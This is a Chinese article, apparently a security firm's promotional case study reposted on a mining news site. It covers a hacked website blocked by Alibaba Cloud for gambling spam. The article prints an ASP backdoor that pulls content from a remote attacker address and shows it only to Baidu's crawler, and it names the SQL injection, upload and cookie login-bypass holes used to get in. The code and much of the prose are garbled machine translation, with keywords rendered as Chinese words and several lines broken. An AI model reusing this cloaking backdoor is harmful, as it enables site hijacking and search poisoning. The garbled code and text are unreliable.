南方矿业网 - 中国矿产行业新闻资讯站!

南方矿业网

当前位置: 主页 > 今日要闻 >

阿里云网站安全提醒并被拦截的处理解决方案

时间:2020-02-14 10:10来源:未知 作者:矿业网 点击: … 次
2019年12月26日,我们的Sine网站安全公司获得了新客户的安全求助。网站由阿里云提示:非法网址阻止访问处理通知导致网站无法访问。打开网站并提示内容被禁止访问。因此,客户网站流
2019年12月26日,我们的Sine网站安全公司获得了新客户的安全求助。网站由阿里云提示:非法网址阻止访问处理通知导致网站无法访问。打开网站并提示内容被禁止访问。因此,客户网站流量大幅下降,网站用户无法正常登录会员系统,造成巨大损失,严重影响官方网站形象。
 
 该客户报告称,他第一次打开网站时,被提示内容被禁止访问,然后收到阿里云发来的“违规网址阻止访问处理通知”电子邮件提醒。电子邮件内容如下:
 
 您的网站网址:http://XXX/content-80-3006-1。html涉及非法和不良信息,违反相关服务协议和《互联网信息服务管理办法》第十五条。目前已阻止访问您的非法网址。如果您对本通知的内容有任何疑问,请及时与我们联系,并提供工作单或电话号码。谢谢你对阿里云的支持。
 
 在阿里云非法网址阻止访问后,我们安排技术人员对其在主要搜索引擎中的网站列表进行安全检查,并发现问题。在百度搜索了客户网站的域名后,我们发现客户网站是由百度提示的:百度网站安全中心提醒你,这个页面上可能有非法信息!客户网站首页的标题也被修改为任何世界杯du注的内容。
 
网站安全防御2020的安全加固解决办法分享
 
 1.该网站被提示违反网址问题分析
 
 网站域名-非法信息处理方案基于《产品购买服务协议》第3条、阿里云平台规则、网络安全法、互联网信息服务管理办法33号令等的权利和义务。如果网站上有任何非法信息,我们将阻止访问包含非法信息的网址和网站域名。当访问您的网站时出现以下页面时,您可以按照以下步骤打开它。
 
 如何查看违规信息?
 
 您可以通过云盾安全控制站-安全控制-互联网有害信息查看涉及违反法律法规的网址信息。
 
 如何申请解锁?
 
 如果您的站点只有部分网址链接无法访问,您需要根据系统的提醒删除非法链接中的所有不符合信息,然后您可以通过云盾安全控制台-安全控制-互联网有害信息(具体的适配场景见下面的常见问题解答)自愿删除处罚。如果您的站点域名下的所有网址都无法访问。
 
 下列条件适用于解锁:
 
 首次申请取消筛选条件:彻底纠正和删除您网站上的非法文件和非法页面(包括但不限于我们通知的内容);在公安备案平台上申请公安备案,通过工单截图并反馈售后技术支持,申请解锁。
 
 特别注意:
 
 在接下来的7天里,我们将再次关闭您的网站,并取消您的帐户参加阿里云平台年度营销活动的资格。第三次,我们将永久关闭你的网站,不再提供解锁申请,你的账号将被取消购买资格。稍后,我们将无法在阿里云平台上购买任何产品。处罚:阿里云的商业安全团队执行监管政策,并在7天内升级网民举报或监控并发布100多个非法页面的网站。处罚标准如下:处罚方法第一次解锁累计次数(7天内100个非法网页)、第二次屏蔽域名累计次数(7天内100个非法网页)、屏蔽域名累计次数、一年内禁止参与阿里云平台营销活动全面整改累计次数、公安平台成功备案累计次数、参与网站安全管理考核培训累计次数。
 
 该域名第三次被屏蔽(7天内多达100个非法网页),账号被禁止购买且从未打开。
 
 2.网站安全分析
 
 在收到客户报告的安全问题后,我们的Sinesafe安全审计部门的技术人员立即对客户的网站代码进行了详细的安全检测和分析,发现网站中有些页面有木马后门,甚至有些页面包含恶意代码,拦截了远程执行代码。
 
 上面的代码是远程获取http地址的内容,然后访问客户端的网站。内容都是些菠菜内容。显然,客户网站遭到黑客攻击,网站程序的源代码也被上传到了网站木马的后门。通过检测,百度劫持在木马后门发现的快照木马,具体来说就是劫持百度蜘蛛(Baidu spider)来抓取黑客篡改的恶意内容,这样百度就可以收集相关的关键词并进行排名。黑客篡改的内容,让百度收集是有目的的。因为该网站在百度中的权重越高,包含在百度中的页面排名就越高,导致这些非法内容的排名越高,获得的客户就越多。通过这种手段来实现目标也太肆无忌惮了。它实际上损害了我们客户网站的利益,以达到黑客自己的利益。由于我们理解阿里云提示的网址阻止我们访问网站违反规定的原因,我们需要对网站安全性进行全面的代码安全审计和渗透测试,并对网站数据库中的所有文档、代码、图片和内容进行详细的安全检测和比较。从SQL注入测试、XSS跨站点安全测试、表单旁路、文件上传漏洞测试、包含漏洞的文件检测、网页挂马、网页后门木马检测(包括一句小马、aspx木马、脚本木马后门)、敏感信息泄露测试、任意文件读取、目录遍历、弱密码安全检测等方面进行了全面的安全检测和漏洞修复。
 
 3.网站安全问题处理流程
 
 在我们安全审计部门的技术人员对网站进行全面的安全检查和审计后,他们发现客户端使用了独立的服务器win2008 64位系统,网站采用的架构是php+aspx+asp+mysql,属于多种编程语言的混合架构。在网站上发现了许多脚本木马后门,并且发布了一个asp代码供每个人查看:
 
 
 
 server.timeout=999999
 
 远程服务器= "http://xxxxx/"/*远程地址
 
 HOST _ name = " HTTP://& request . server variables(" HTTP _ HOST ")& request . server variables(" _ name ")
 
 远程文件=远程服务器& "/索引. php"& "?host = " & host _ Name & " & URL = " & request . Server variables("查询_字符串")& " & domain = " & request . Server variables("服务器_名称")
 
 Content_mb=GetHtml(远程文件)
 
 响应。写入内容_mb
 
 % >
 
 
 
 函数GetHtml(url)
 
 设置ObjXMLHTTP =服务器。创建对象(“MSXML2.serverXMLHTTP”)
 
 ObjXMLHTTP。打开“获取”,网址,假
 
 ObjXMLHTTP.setRequestHeader "用户代理"、" aQ0O010O "
 
 ObjXMLHTTP .发送
 
 getHTMl = Objxmlhttp . response body
 
 设置ObjXMLHTTP =无
 
 设置objStream =服务器。创建对象(“Adodb”。流”)
 
 objStream。类型= 1
 
 objStream。模式=3
 
 objStream。打开
 
 objStream。编写GetHtml
 
 objStream。位置= 0
 
 objStream。类型= 2
 
 objStream。Charset = "gb2312 "
 
 GetHtml = objStream。ReadText
 
 objStream。关闭
 
 结束功能
 
 % >
 
 上述代码的主要功能是通过asp文件获取黑客的远程地址。该代码还创建判断条件并判断浏览器的标题信息。如果用户代理是baidu,那么get将被允许获取内容。如果其他用户代理内容为,则跳转到404默认页面。内容图如下:
 
 由此,我们可以看出这个黑客的攻击方法也非常高,所以你无法检测到它,因为它是一个404页。伪装得太逼真了(这似乎是真爱,呵呵,愚弄年轻女孩没关系,但很抱歉我们sine安全是认真的)。当用户通过搜索引擎打开时,该赌bo的内容将被直接显示,并且如果地址在浏览器中被直接打开,则404未找到的内容将出现。
 
 在网站的图片以及数据库配置文件目录中也发现了一些后门木马和图片木马的文字:
 
 移除这些网站木马后门后,网站安全性尚未完成。接下来最重要的是看看网站是如何上传到脚本木马后门的。通过对网站的全面安全检查和网站漏洞检查,发现客户网站存在sql注入和网站上传漏洞,后台可以使用cookie绕过登录权限漏洞,可以直接上传脚本木马并获得服务器权限,从而修改和篡改网站代码。发现漏洞后,我们会立即修复和加强客户网站的漏洞,并部署网站以防止篡改。回应阿里云的提示:我们还帮助提交了阿里云违反网址拦截访问通知的工作单。阿里云的工程加工效率仍然相当快。首先取消了对网站的封锁,问题就这样解决了。
 
 
(责任编辑:管理员)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------